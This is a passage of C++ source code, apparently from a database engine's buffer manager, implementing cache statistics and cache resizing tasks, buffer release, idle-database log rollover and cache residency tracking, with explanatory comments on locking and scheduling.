// BFIMaintCacheStatsITask(): the DBA task.
//
// o Calls into resource manager functions to retrieve the optimal cache size and
// set the optimal size as the next cache set point;
//
// o Attempts to resize the cache (shrink quiesced buffers or grow the cache). This
// may not happen if the protecting semaphore can't be acquired, in which case a
// pending request will be registered so that resizing will occur later when the
// semaphore owner releases ownership;
//
// o Push the idle cache stats task further out into the future.
//
// o Finally, it quiesces itself if the cache size is within acceptable quiescing ranges.
void BFIMaintCacheStatsITask( VOID *, VOID * pvContext )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
const TICK tickNow = TickOSTimeCurrent();
AtomicExchange( (LONG *)&g_tickLastMaintCacheStats, tickNow );
Assert( g_semMaintCacheStatsRequest.CAvail() == 0 /* as closed to FOwner() as we can get */ );
g_critCacheSizeSetTarget.Enter();
// update our RAM stats. this will also grow the cache if appropriate
// Note: This is a complicated way of setting cbfCacheNew.
g_cacheram.UpdateStatistics();
g_cacheram.SetOptimalResourcePoolSize(); // note: this calls g_cacheram.ConsumeResourceAdjustments()
// attempt to resize the cache to the new cache size
OnNonRTM( g_tickMaintCacheStatsResizeLastAttempt = TickOSTimeCurrent() );
OnNonRTM( g_cbfMaintCacheStatsResizeLastAttempt = cbfCacheTarget );
g_critCacheSizeSetTarget.Leave();
OnDebug( BOOL fAcquiredSemaphore = fFalse );
const ERR errMaintCacheSize = ErrBFIMaintCacheSizeRequest( OnDebug( &fAcquiredSemaphore ) );
#ifndef RTM
if ( errMaintCacheSize >= JET_errSuccess )
{
OnNonRTM( g_tickMaintCacheStatsResizeLast = TickOSTimeCurrent() );
OnNonRTM( g_cbfMaintCacheStatsResizeLast = cbfCacheTarget );
}
#endif // !RTM
#ifdef DEBUG
if ( fAcquiredSemaphore )
{
g_cMaintCacheSizeReqAcquireFailures = 0;
}
else
{
// we've failed to acquire the semaphore to schedule the task. this means the task must be executing
// right now or in the process of rescheduling itself to complete its job.
S_ASSERT( dtickMaintCacheSizeRequest <= ( dtickMaintCacheStatsPeriod / 2 ) );
g_cMaintCacheSizeReqAcquireFailures++;
const TICK dtickOrphanedTaskThreshold = (TICK)UlConfigOverrideInjection( 57528, cmsecDeadlock );
Expected( dtickOrphanedTaskThreshold >= dtickMaintCacheStatsPeriod );
Expected( g_cMaintCacheSizeReqAcquireFailures <= ( dtickOrphanedTaskThreshold / dtickMaintCacheStatsPeriod ) );
}
#endif // DEBUG
// If it is the idle cache-stats task, we do not need to cancel anything
if ( pvContext == fIdleCacheStatTask )
{
return;
}
BFIMaintIdleCacheStatsSchedule();
// If our cache size cannot change then we will deactivate cache size
// maintenance. Also, if we no longer need to worry about the cache size
// then we no longer need to collect cache stats so we will deactivate
// their collection as well. Do not quiesce the task if we are operating
// in an over-allocated situation due to deadlock protection, except for
// a battery-operated device, in which case we'll opt for saving battery
// over achieving an optimal cache size.
BOOL fQuiesceTask = fFalse;
if ( ( ( DtickDelta( g_tickLastCacheStatsRequest, tickNow ) > dtickMaintCacheStatsQuiesce ) || FBFIMaintCacheSizeQuiescedInSensitivityRange() ) &&
( ( cbfCacheDeadlock <= g_cbfCacheTargetOptimal ) || FUtilSystemRestrictIdleActivity() ) )
{
BOOL fLowMemory;
// Before deciding to quiesce the task, make sure that we register for
// the low memory notification successfully
if ( ErrOSQueryMemoryNotification( g_pMemoryNotification, &fLowMemory ) >= JET_errSuccess &&
!fLowMemory &&
ErrOSRegisterMemoryNotification( g_pMemoryNotification ) >= JET_errSuccess )
{
fQuiesceTask = fTrue;
}
}
if ( !fQuiesceTask &&
ErrBFIMaintScheduleTask( g_posttBFIMaintCacheStatsITask, NULL, dtickMaintCacheStatsPeriod, dtickMaintCacheStatsSlop ) >= JET_errSuccess )
{
// do not need to release the semaphore since we rescheduled ourselves
return;
}
BFIMaintCacheStatsRelease();
}
TICK g_tickLastMaintCacheSizeRequestSuccess = 0;
// ErrBFIMaintCacheStatsRequest(): tries to kick off BFIMaintCacheStatsITask.
//
// o Schedules the cache idle stats maintenance task;
//
// o Returns immediately if the cache is already at the right size. In theory
// this would not be required because the task would quiesce itself, but
// we just want to save an extra unecessary scheduling;
//
// o Schedules BFIMaintCacheStatsITask.
//
// o Schedules the idle cache stats task.
INLINE ERR ErrBFIMaintCacheStatsRequest( const BFIMaintCacheStatsRequestType bfmcsrt )
{
ERR err = JET_errSuccess;
BOOL fReleaseSemaphore = fFalse;
const BOOL fForce = ( bfmcsrt == bfmcsrtForce );
const TICK tickNow = TickOSTimeCurrent();
// this may go slightly backwards but it is not a big deal
if ( DtickDelta( g_tickLastCacheStatsRequest, tickNow ) > 0 )
{
g_tickLastCacheStatsRequest = tickNow;
}
// quick check to see if we should schedule a task - we may not schedule
// the task if it was scheduled recently - not a big deal
if ( !fForce && ( DtickDelta( g_tickLastMaintCacheStats, tickNow ) < dtickMaintCacheStatsTooOld ) )
{
goto HandleError;
}
// ignore the request if our cache size cannot change
//
// variable-sized caches (DBA) should not drop the task
// based solely on the sensitivity calculation because they
// need the actual task to run in order to update the statistics
// to make the decision to quiesce cache sizing.
//
if ( FBFIMaintCacheSizeQuiescedInSensitivityRange() && FBFICacheSizeFixed() )
{
goto HandleError;
}
// try to acquire the right to request cache stats maintenance
if ( FBFIMaintCacheStatsTryAcquire() )
{
fReleaseSemaphore = fTrue;
g_tickLastMaintCacheSizeRequestSuccess = TickOSTimeCurrent();
// upon successfully scheduling the cache stats task below, there would be no need to run the idle
// stats task anymore, we could just cancel the idle stats task, but scheduling cancelled tasks is
// not encouraged so we'll just push the task further out
BFIMaintIdleCacheStatsSchedule();
// schedule a task to maintain our cache stats which will in turn manage
// our cache size maintenance
Call( ErrBFIMaintScheduleTask( g_posttBFIMaintCacheStatsITask, NULL, dtickMaintCacheStatsPeriod, dtickMaintCacheStatsSlop ) );
fReleaseSemaphore = fFalse;
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: started Cache Stats Collection", __FUNCTION__ ) );
}
HandleError:
if ( fReleaseSemaphore )
{
BFIMaintCacheStatsRelease();
}
return err;
}
INLINE BOOL FBFIMaintCacheStatsTryAcquire()
{
return g_semMaintCacheStatsRequest.FTryAcquire();
}
INLINE void BFIMaintCacheStatsRelease()
{
Assert( g_semMaintCacheStatsRequest.CAvail() == 0 );
g_semMaintCacheStatsRequest.Release();
}
POSTIMERTASK g_posttBFIMaintCacheSizeITask = NULL;
#ifndef RTM
TICK g_tickMaintCacheSizeRequestLast = 0;
TICK g_tickMaintCacheSizeRequestSyncLastAttempt = 0;
TICK g_tickMaintCacheSizeRequestSyncLastSuccess = 0;
TICK g_tickMaintCacheSizeRequestAsyncLastAttempt = 0;
TICK g_tickMaintCacheSizeRequestAsyncLastSuccess = 0;
#endif // !RTM
// ErrBFIMaintCacheSizeRequest(): tries to resize the cache.
//
// o Tries to acquire the right to resize the cache. If it fails, a pending request
// will be registered so the current owner of the semaphore will take care of it;
//
// o If the next target cache size indicates growth, tries to resize it synchronously.
// If it fails, tries to resize it asynchronously by scheduling BFIMaintCacheSizeITask;
//
// o If the cache needs shrinking, jump straight to the asynchronous resizing because
// the asynchronous buffer quiescing task needs to go through the buffers to
// evict/flush them first.
INLINE ERR ErrBFIMaintCacheSizeRequest( OnDebug( BOOL* const pfAcquiredSemaphoreCheck ) )
{
ERR err = JET_errSuccess;
BOOL fReleaseSemaphore = fFalse;
BOOL fNeedsAsyncSizing = fFalse;
OnNonRTM( g_tickMaintCacheSizeRequestLast = TickOSTimeCurrent() );
if ( !FBFIMaintCacheSizeAcquire() )
{
goto HandleError;
}
fReleaseSemaphore = fTrue;
AtomicExchange( &g_cMaintCacheSizePending, 0 );
#ifdef DEBUG
if ( pfAcquiredSemaphoreCheck != NULL )
{
*pfAcquiredSemaphoreCheck = fTrue;
}
#endif // DEBUG
// If the cache needs to grow, try to resize it synchronously.
// There is no point in shrinking it synchronously because
// the asynchronous buffer quiescing task needs to go through
// the buffers to evict/flush them first.
const LONG_PTR cbfCacheTargetT = cbfCacheTarget;
if ( cbfCacheTargetT > cbfCacheSize )
{
OnNonRTM( g_tickMaintCacheSizeRequestSyncLastAttempt = TickOSTimeCurrent() );
// If the synchronous cache resizing does not work, try and
// schedule it asynchronously.
if ( ErrBFICacheGrow() < JET_errSuccess )
{
fNeedsAsyncSizing = fTrue;
}
else
{
OnNonRTM( g_tickMaintCacheSizeRequestSyncLastSuccess = TickOSTimeCurrent() );
goto HandleError;
}
}
else if ( cbfCacheTargetT < cbfCacheSize )
{
fNeedsAsyncSizing = fTrue;
}
else if ( g_cbfCacheTargetOptimal < cbfCacheTargetT )
{
// The scavenging algorithm is responsible for maintaining cbfCacheDeadlock,
// which may get stale at a higher-than-desirable value on idle systems, preventing
// the cache from shrinking further, so force resizing if that threshold exceeds
// the optimal size to get that value updated.
Assert( cbfCacheTargetT == cbfCacheSize );
fNeedsAsyncSizing = fTrue;
}
// Check if we need asynchronous sizing.
if ( fNeedsAsyncSizing )
{
OnNonRTM( g_tickMaintCacheSizeRequestAsyncLastAttempt = TickOSTimeCurrent() );
Call( ErrBFIMaintScheduleTask( g_posttBFIMaintCacheSizeITask,
NULL,
dtickMaintCacheSizeRequest,
0 ) );
OnNonRTM( g_tickMaintCacheSizeRequestAsyncLastSuccess = TickOSTimeCurrent() );
fReleaseSemaphore = fFalse;
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: started Cache Size Maintenance", __FUNCTION__ ) );
}
HandleError:
if ( fReleaseSemaphore )
{
const ERR errT = ErrBFIMaintCacheSizeReleaseAndRescheduleIfPending();
if ( err >= JET_errSuccess )
{
err = errT;
}
}
return err;
}
#ifndef RTM
TICK g_tickMaintCacheSizeCacheTargetLastAttempt = 0;
LONG_PTR g_cbfMaintCacheSizeCacheTargetLastAttempt = 0;
TICK g_tickMaintCacheSizeCacheTargetLast = 0;
LONG_PTR g_cbfMaintCacheSizeCacheTargetLast = 0;
TICK g_tickMaintCacheSizeLastSuccess = 0;
TICK g_tickMaintCacheSizeLastContinue = 0;
TICK g_tickMaintCacheSizeLastFailedReschedule = 0;
#endif // !RTM
// BFIMaintCacheSizeITask(): the cache sizing task.
//
// o Reschedules itself until the job is considered done, which is when the current
// cache size is less than or equal to the current set point (for shrinkage) or
// the cache size gets successfully resized up (for grow); Note that it's not
// considered done if the cache target is above the optimal target. This happens
// when cbfCacheDeadlock is larger than the optimal cache size, which can happen
// if there is a significant number of pages undergoing write or are pinned by
// LLR or permanent errors.
//
// o For growth, we call directly into ErrBFICacheGrow() and consider the job done
// if that call succeeds;
//
// o For shrinkage, the heavy-lifting is accomplished by BFIMaintCacheSizeIShrink().
// Clean buffers are quisced right away. Dirty buffers are issued a write against
// so they can be cleaned/evicted soon (most likely on the next pass);
//
// o Upon releasing the semaphore, we also check for pending requests, in which case
// we will reschedule the task so that it realizes any new changes in intention.
void BFIMaintCacheSizeITask( void*, void* )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
Assert( g_fBFMaintInitialized );
AtomicExchange( &g_cMaintCacheSizePending, 0 );
Assert( g_semMaintCacheSize.CAvail() == 0 /* as closed to FOwner() as we can get */ );
OnDebug( g_cMaintCacheSizeReqAcquireFailures = 0 );
g_tickLastMaintCacheSize = TickOSTimeCurrent();
// maintain our cache size
const LONG_PTR cbfCacheSizeStart = cbfCacheSize;
const __int64 cbCacheSizeStart = CbBFICacheBufferSize();
const LONG_PTR cbfCacheTargetT = cbfCacheTarget;
OnNonRTM( g_tickMaintCacheSizeCacheTargetLastAttempt = TickOSTimeCurrent() );
OnNonRTM( g_cbfMaintCacheSizeCacheTargetLastAttempt = cbfCacheTargetT );
if ( cbfCacheTargetT > cbfCacheSize )
{
(void)ErrBFICacheGrow();
}
else if ( ( cbfCacheTargetT < cbfCacheSize ) ||
( g_cbfCacheTargetOptimal < cbfCacheTarget ) ) // force re-evaluation of cache sizing.
{
BFIMaintCacheSizeIShrink();
}
// determine if our job is done.
// note that it won't be considered done if the target is above optimal (i.e., deadlock protection is active), unless
// we're running on battery-based systems, in which case we're prioritizing quiescing the task over getting to the
// optimal size.
const BOOL fDone = ( cbfCacheSize == cbfCacheTarget ) && ( ( g_cbfCacheTargetOptimal >= cbfCacheTarget ) || FUtilSystemRestrictIdleActivity() );
OnNonRTM( g_tickMaintCacheSizeCacheTargetLast = TickOSTimeCurrent() );
OnNonRTM( g_cbfMaintCacheSizeCacheTargetLast = cbfCacheTarget );
if ( fDone )
{
OnNonRTM( g_tickMaintCacheSizeLastSuccess = TickOSTimeCurrent() );
}
else
{
OnNonRTM( g_tickMaintCacheSizeLastContinue = TickOSTimeCurrent() );
}
const LONG_PTR cbfCacheSizeStop = cbfCacheSize;
const __int64 cbCacheSizeStop = CbBFICacheBufferSize();
Unused( cbfCacheSizeStart );
Unused( cbCacheSizeStart );
Unused( cbfCacheSizeStop );
Unused( cbCacheSizeStop );
OSTrace(
JET_tracetagBufferManagerMaintTasks, // this logs a bit more than I had wanted this tag too ...
OSFormat(
"%s: changed cache size by %I64d buffers (from %I64d to %I64d), %I64d bytes (from %I64d to %I64d)",
__FUNCTION__,
(__int64)( cbfCacheSizeStop - cbfCacheSizeStart ),
(__int64)cbfCacheSizeStart,
(__int64)cbfCacheSizeStop,
cbCacheSizeStop - cbCacheSizeStart,
cbCacheSizeStart,
cbCacheSizeStop
) );
// if we have not completed our maintenance of the cache size then
// try to schedule another attempt in the near future
if ( !fDone )
{
if ( ErrBFIMaintScheduleTask( g_posttBFIMaintCacheSizeITask,
NULL,
dtickMaintCacheSizeRetry,
0 ) < JET_errSuccess )
{
// we have now lost our right to make async requests
(void)ErrBFIMaintCacheSizeReleaseAndRescheduleIfPending();
OnNonRTM( g_tickMaintCacheSizeLastFailedReschedule = TickOSTimeCurrent() );
}
else
{
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: started Cache Size Maintenance", __FUNCTION__ ) );
}
}
else
{
(void)ErrBFIMaintCacheSizeReleaseAndRescheduleIfPending();
}
Assert( g_fBFMaintInitialized );
}
// Releases a buffer's memory usage, thus reducing our total committed cache
void BFIReleaseBuffer( PBF pbf )
{
Assert( g_critCacheSizeResize.FOwner() );
// mark this BF as quiesced
Assert( IbfBFICachePbf( pbf ) < cbfCacheAddressable );
Assert( !pbf->fQuiesced );
AtomicDecrement( (LONG*)&g_cbfCacheClean );
cbfCacheSize--; // atomic not required
Assert( cbfCacheSize >= 0 );
Assert( !pbf->fInOB0OL && pbf->ob0ic.FUninitialized() );
OnDebug( const BOOL fWasAvailable = pbf->fAvailable );
pbf->fAvailable = fFalse;
pbf->fQuiesced = fTrue;
g_bfquiesced.InsertAsNextMost( pbf ); // insert at the tail (next-most).
// release the memory owned by this BF if possible
Assert( ( pbf->icbBuffer == icbPage0 ) || ( (DWORD)g_rgcbPageSize[pbf->icbBuffer] >= OSMemoryPageCommitGranularity() ) );
if ( pbf->bfat == bfatFracCommit )
{
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( pbf, bfrsNotCommitted );
Expected( bfrsOld != bfrsNotCommitted || fWasAvailable );
Assert( pbf->icbBuffer != icbPage0 || bfrsOld == bfrsNotCommitted );
if ( pbf->icbBuffer != icbPage0 )
{
// Dehydrate to 0. It should never fail because we're shrinking.
CallS( ErrBFISetBufferSize( pbf, icbPage0, fFalse ) );
}
}
pbf->sxwl.ReleaseOwnership( bfltWrite );
BFIAssertNewlyAllocatedPage( pbf, fTrue );
}
// shrinks the cache from its current size down to the set point
#ifndef RTM
TICK g_tickCacheShrinkLast = 0;
#endif // !RTM
void BFIMaintCacheSizeIShrink()
{
Assert( g_semMaintCacheSize.CAvail() == 0 );
if ( !g_semMaintScavenge.FTryAcquire() )
{
return;
}
OnNonRTM( g_tickCacheShrinkLast = TickOSTimeCurrent() );
(void)ErrBFIMaintScavengeIScavengePages( __FUNCTION__, fFalse );
g_semMaintScavenge.Release();
}
#ifndef RTM
TICK g_tickMaintCacheSizeAcquireLast = 0;
TICK g_tickMaintCacheSizeReleaseLast = 0;
TICK g_tickMaintCacheSizeReleaseAndRescheduleLast = 0;
TICK g_tickMaintCacheSizeRescheduleLastAttempt = 0;
TICK g_tickMaintCacheSizeRescheduleLastSuccess = 0;
#endif // !RTM
INLINE BOOL FBFIMaintCacheSizeAcquire()
{
AtomicIncrement( &g_cMaintCacheSizePending );
if ( g_semMaintCacheSize.FTryAcquire() )
{
g_tickMaintCacheSizeStartedLast = TickOSTimeCurrent();
g_cbfMaintCacheSizeStartedLast = cbfCacheSize;
OnNonRTM( g_tickMaintCacheSizeAcquireLast = g_tickMaintCacheSizeStartedLast );
return fTrue;
}
return fFalse;
}
INLINE ERR ErrBFIMaintCacheSizeReleaseAndRescheduleIfPending()
{
ERR err = JET_errSuccess;
OnNonRTM( g_tickMaintCacheSizeReleaseAndRescheduleLast = TickOSTimeCurrent() );
Assert( g_fBFMaintInitialized );
Assert( g_semMaintCacheSize.CAvail() == 0 );
g_tickMaintCacheSizeStartedLast = TickOSTimeCurrent();
g_cbfMaintCacheSizeStartedLast = cbfMainCacheSizeStartedLastInactive;
g_semMaintCacheSize.Release();
OnNonRTM( g_tickMaintCacheSizeReleaseLast = TickOSTimeCurrent() );
if ( g_cMaintCacheSizePending > 0 &&
g_semMaintCacheSize.FTryAcquire() )
{
g_tickMaintCacheSizeStartedLast = TickOSTimeCurrent();
g_cbfMaintCacheSizeStartedLast = cbfCacheSize;
OnNonRTM( g_tickMaintCacheSizeRescheduleLastAttempt = g_tickMaintCacheSizeStartedLast );
// If there are pending requests, try and run cache resizing asynchronously.
// Instead of releasing the semaphore, testing for pending requests
// and trying to reacquire the semaphore to resize, one could consider
// testing for pending requests before releasing to avoid losing the
// semaphore temporarily. The problem with that approach is that there
// could be a small window where someone interested in resizing
// has not incremented the count yet, then we think there are no
// pending requests and proceed to releasing the sempahore without
// resizing. In the meantime, the other thread may try and grab the
// semaphore before we release it and so it will fail to resize and
// will have the its pending request go unnoticed.
err = ErrBFIMaintScheduleTask( g_posttBFIMaintCacheSizeITask,
NULL,
dtickMaintCacheSizeRequest,
0 );
if ( err < JET_errSuccess )
{
Assert( g_semMaintCacheSize.CAvail() == 0 );
g_tickMaintCacheSizeStartedLast = TickOSTimeCurrent();
g_cbfMaintCacheSizeStartedLast = cbfMainCacheSizeStartedLastInactive;
g_semMaintCacheSize.Release();
OnNonRTM( g_tickMaintCacheSizeReleaseLast = TickOSTimeCurrent() );
}
else
{
OnNonRTM( g_tickMaintCacheSizeRescheduleLastSuccess = TickOSTimeCurrent() );
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: started Cache Size Maintenance", __FUNCTION__ ) );
}
}
Assert( g_fBFMaintInitialized );
return err;
}
TICK DtickBFIMaintCacheSizeDuration()
{
if ( g_fBFInitialized && g_semMaintCacheSize.CAvail() == 0 )
{
return DtickDelta( g_tickMaintCacheSizeStartedLast, TickOSTimeCurrent() );
}
else
{
return 0;
}
}
// Idle Database
CSemaphore g_semMaintIdleDatabaseRequest( CSyncBasicInfo( _T( "g_semMaintIdleDatabaseRequest" ) ) );
TICK g_tickMaintIdleDatabaseLast;
POSTIMERTASK g_posttBFIMaintIdleDatabaseITask = NULL;
inline const char* BFFormatLGPOS( const LGPOS* const plgpos )
{
return OSFormat( "%05lX,%04hX,%04hX",
INT( plgpos->lGeneration ),
SHORT( plgpos->isec ),
SHORT( plgpos->ib ) );
}
void BFIMaintIdleDatabaseRequest( PBF pbf )
{
// if this buffer contains a page that is pinned in memory by the waypoint
// and its lgposModify is more recent than the newest lgposModify we have
// seen for this database then save that lgposModify as the new high water
// mark for pages pinned by the waypoint for that database in the cache
FMP* const pfmp = &g_rgfmp[ pbf->ifmp ];
const LGPOS lgposWaypoint = pfmp->LgposWaypoint();
if ( CmpLgpos( &pbf->lgposModify, &lgposMin ) != 0 &&
CmpLgpos( &lgposWaypoint, &lgposMin ) != 0 &&
CmpLgpos( &pbf->lgposModify, &lgposWaypoint ) >= 0 )
{
// we may already have entered this lock as a reader so disable our
// deadlock detection and ownership tracking temporarily to allow us
// to enter the lock recursively as a reader. we manually assert that
// we do not own it as a writer because that would cause a deadlock
// try to acquire the right to perform book keeping
Assert( pfmp->FNotBFContextWriter() );
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
CLockDeadlockDetectionInfo::DisableDeadlockDetection();
BOOL fAcquiredBook = pfmp->FTryEnterBFContextAsReader();
if ( fAcquiredBook )
{
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
Assert( pbffmp );
if ( CmpLgpos( &pbf->lgposModify, &pbffmp->lgposNewestModify ) > 0 )
{
if ( pbf->lgposModify.lGeneration > pbffmp->lgposNewestModify.lGeneration )
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: ipinst %s, ifmp %s has new pinned pages (lgposNewestModify = %s; lgposWaypoint = %s)",
__FUNCTION__,
OSFormatUnsigned( IpinstFromPinst( PinstFromIfmp( pbf->ifmp ) ) ),
OSFormatUnsigned( pbf->ifmp ),
BFFormatLGPOS( &pbf->lgposModify ),
BFFormatLGPOS( &lgposWaypoint ) ) );
}
pbffmp->lgposNewestModify = pbf->lgposModify;
}
pfmp->LeaveBFContextAsReader();
}
CLockDeadlockDetectionInfo::EnableDeadlockDetection();
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
}
// try to acquire the right to request idle database maintenance
BOOL fAcquiredAsync = g_semMaintIdleDatabaseRequest.FTryAcquire();
// if we acquired the right to maintain the databases, then we will try
// to do so
if ( fAcquiredAsync )
{
// schedule a task to maintain the idle databases
if ( ErrBFIMaintScheduleTask( g_posttBFIMaintIdleDatabaseITask, NULL, dtickMaintIdleDatabaseDelay, 0 ) >= JET_errSuccess )
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: Idle Database Maintenance Scheduled",
__FUNCTION__ ) );
// we have now lost our right to make async requests
fAcquiredAsync = fFalse;
}
}
// if we own the right to make async maintenance requests then
// we no longer need it
if ( fAcquiredAsync )
{
Assert( g_semMaintIdleDatabaseRequest.CAvail() == 0 );
g_semMaintIdleDatabaseRequest.Release();
}
}
void BFIMaintIdleDatabaseITask( void*, void* )
{
// this task automatically has the right to async maintenance
BOOL fAcquiredAsync = fTrue;
// maintain our idle databases
BFIMaintIdleDatabaseIRollLogs();
// remember the time when we last maintained the idle databases
g_tickMaintIdleDatabaseLast = TickOSTimeCurrent();
// if we own the right to make async maintenance requests then
// we no longer need it
if ( fAcquiredAsync )
{
Assert( g_semMaintIdleDatabaseRequest.CAvail() == 0 );
g_semMaintIdleDatabaseRequest.Release();
}
}
BOOL FBFIMaintIdleDatabaseIDatabaseHasPinnedPages( const INST * const pinst, const DBID dbid )
{
const IFMP ifmp = pinst->m_mpdbidifmp[ dbid ];
FMP* const pfmp = &g_rgfmp[ ifmp ];
BOOL fPinnedPages = fFalse;
if ( ifmp >= g_ifmpMax || !pfmp->FAttached() )
{
fPinnedPages = fFalse;
}
else
{
// read the newest lgposModify of any BF for which idle database
// maintenance was requested for this database
pfmp->EnterBFContextAsReader();
const BFFMPContext* const pbffmp = (BFFMPContext*)pfmp->DwBFContext();
const LGPOS lgposNewestModify = ( pbffmp && pbffmp->fCurrentlyAttached ) ? pbffmp->lgposNewestModify : lgposMin;
pfmp->LeaveBFContextAsReader();
// read the current waypoint
const LGPOS lgposWaypoint = pfmp->LgposWaypoint();
// if the newest lgposModify is valid and the current waypoint is
// valid and the newest lgposModify is newer than the waypoint
// then remember that this instance has pages pinned by the
// waypoint
if ( CmpLgpos( &lgposNewestModify, &lgposMin ) != 0 &&
CmpLgpos( &lgposWaypoint, &lgposMin ) != 0 &&
CmpLgpos( &lgposNewestModify, &lgposWaypoint ) >= 0 )
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: pinst %s, ifmp %s has pinned pages (lgposNewestModify = %s; lgposWaypoint = %s)",
__FUNCTION__,
OSFormatPointer( pinst ),
OSFormatUnsigned( ifmp ),
BFFormatLGPOS( &lgposNewestModify ),
BFFormatLGPOS( &lgposWaypoint ) ) );
fPinnedPages = fTrue;
}
}
return fPinnedPages;
}
void BFIMaintIdleDatabaseIRollLogs( INST * const pinst )
{
// Roll logs for one instance. The instance should be locked already
BOOL fPinnedPages = fFalse;
for ( DBID dbid = dbidMin; dbid < dbidMax; dbid++ )
{
fPinnedPages = fPinnedPages || FBFIMaintIdleDatabaseIDatabaseHasPinnedPages( pinst, dbid );
}
// if this instance has pages that are pinned by the waypoint and
// we have not generated a new log in this instance recently then
// force the log to rollover to help unpin some of those pages
TICK dtickLogRollMin = 24 * 60 * 60 * 1000; // 1 day in ticks, just for defense in depth.
if ( FDefaultParam( pinst, JET_paramPeriodicLogRolloverLLR ) )
{
if ( UlParam( pinst, JET_paramWaypointLatency ) )
{
dtickLogRollMin = dtickMaintIdleDatabaseClearLLR / (ULONG)UlParam( pinst, JET_paramWaypointLatency );
dtickLogRollMin = max( 30 * 1000, dtickLogRollMin ); // just in case
}
}
else
{
dtickLogRollMin = (ULONG)UlParam( pinst, JET_paramPeriodicLogRolloverLLR ) * 1000;
}
if ( fPinnedPages &&
!pinst->m_plog->FLGRolloverInDuration( dtickLogRollMin ) )
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: pinst %s has pinned pages and hasn't rolled a log for %s ms (tickNow = %s)",
__FUNCTION__,
OSFormatPointer( pinst ),
OSFormatUnsigned( dtickLogRollMin ),
OSFormatUnsigned( TickOSTimeCurrent() ) ) );
const ERR err = ErrLGForceLogRollover( pinst, __FUNCTION__ );
if ( err < JET_errSuccess )
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: pinst %s failed to roll a new log with error %s",
__FUNCTION__,
OSFormatPointer( pinst ),
OSFormatSigned( err ) ) );
}
else
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: pinst %s rolled a new log",
__FUNCTION__,
OSFormatPointer( pinst ) ) );
}
}
}
void BFIMaintIdleDatabaseIRollLogs()
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: Beginning Idle Database Maintenance",
__FUNCTION__ ) );
// for each initialized instance
for ( size_t ipinst = 0; ipinst < g_cpinstMax; ipinst++ )
{
extern CRITPOOL< INST* > g_critpoolPinstAPI;
CCriticalSection * const pcritInst = &g_critpoolPinstAPI.Crit(&g_rgpinst[ipinst]);
pcritInst->Enter();
INST * const pinst = g_rgpinst[ ipinst ];
if ( pinstNil == pinst )
{
pcritInst->Leave();
}
else
{
// Use APILock to exclude the initializing and
// terminating an instance.
const BOOL fAPILocked = pinst->APILock( pinst->fAPICheckpointing );
pcritInst->Leave();
if ( fAPILocked )
{
if ( pinst->m_fJetInitialized )
{
BFIMaintIdleDatabaseIRollLogs( pinst );
}
pinst->APIUnlock( pinst->fAPICheckpointing );
}
}
}
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: Ending Idle Database Maintenance",
__FUNCTION__ ) );
}
// Cache residency map
//
// Functions interested in consuming the residency map should call BFIMaintCacheResidencyRequest().
// The timestamp of the last interested consumer will be stored in g_tickLastUpdateStatisticsRequest and will
// only be updated roughly every tenth of dtickMaintCacheResidencyPeriod to avoid excessive concurrency in
// updating that global variable by very hot codepaths.
// dtickMaintCacheResidencyTooOld is used to short-circuit BFIMaintCacheResidencyRequest() early and avoid
// the interlocked operation on g_fUpdateStatisticsMayRequest.
// The task looks at g_tickLastUpdateStatisticsRequest and decides to cancel the task if more than
// dtickMaintCacheResidencyQuiesce has elapsed since the last intereseted consumer. The task will only be
// re-enabled after dtickMaintCacheResidencyTooOld has elapsed since the last update to the residency map
// and there is someone interested.
//
TICK g_tickLastUpdateStatisticsRequest = 0;
LONG g_fUpdateStatisticsMayRequest = fFalse;
BOOL g_fMaintCacheResidencyInit = fFalse;
BOOL g_fEnabledCacheResidencyTask = fTrue;
POSTIMERTASK g_posttBFIMaintCacheResidencyITask = NULL;
void BFIMaintCacheResidencyInit()
{
Assert( !g_fUpdateStatisticsMayRequest );
Assert( !g_fMaintCacheResidencyInit );
const TICK tickNow = TickOSTimeCurrent();
g_tickLastUpdateStatistics = tickNow - dtickMaintCacheResidencyTooOld;
g_tickLastUpdateStatisticsRequest = tickNow - dtickMaintCacheResidencyQuiesce;
g_fMaintCacheResidencyInit = fTrue;
AtomicExchange( &g_fUpdateStatisticsMayRequest, fTrue );
}
void BFIMaintCacheResidencyTerm()
{
// at this point, we expect the g_blBFMaintScheduleCancel binary lock to have prevented new tasks from
// being issued, so we will cancel/wait for any pending/executing ones and finally set the flag
// to fFalse.
g_fMaintCacheResidencyInit = fFalse;
if ( g_posttBFIMaintCacheResidencyITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintCacheResidencyITask );
}
AtomicExchange( &g_fUpdateStatisticsMayRequest, fFalse );
Assert( !g_fMaintCacheResidencyInit );
Assert( !g_fUpdateStatisticsMayRequest );
}
INLINE void BFIMaintCacheResidencyRequest()
{
// if view-cache is enabled, there isn't much point in collecting memory page residency
// information because clean pages are mapped and would show up as non-resident anyways.
// because of that, the code to handle non-resident pages (hard-faulting from DB file)
// is not applicable to view-cache.
// dirty pages are part of our working set even in view-cache, but they always need to be
// hard-faulted from the page file, so no need to collect residency information in this case
// either.
if ( BoolParam( JET_paramEnableViewCache ) )
{
return;
}
// if the task is enabled
if ( g_fEnabledCacheResidencyTask &&
( g_fEnabledCacheResidencyTask = !FUtilSystemRestrictIdleActivity() ) )
{
const TICK tickNow = TickOSTimeCurrent();
// this may go slightly backwards but it is not a big deal
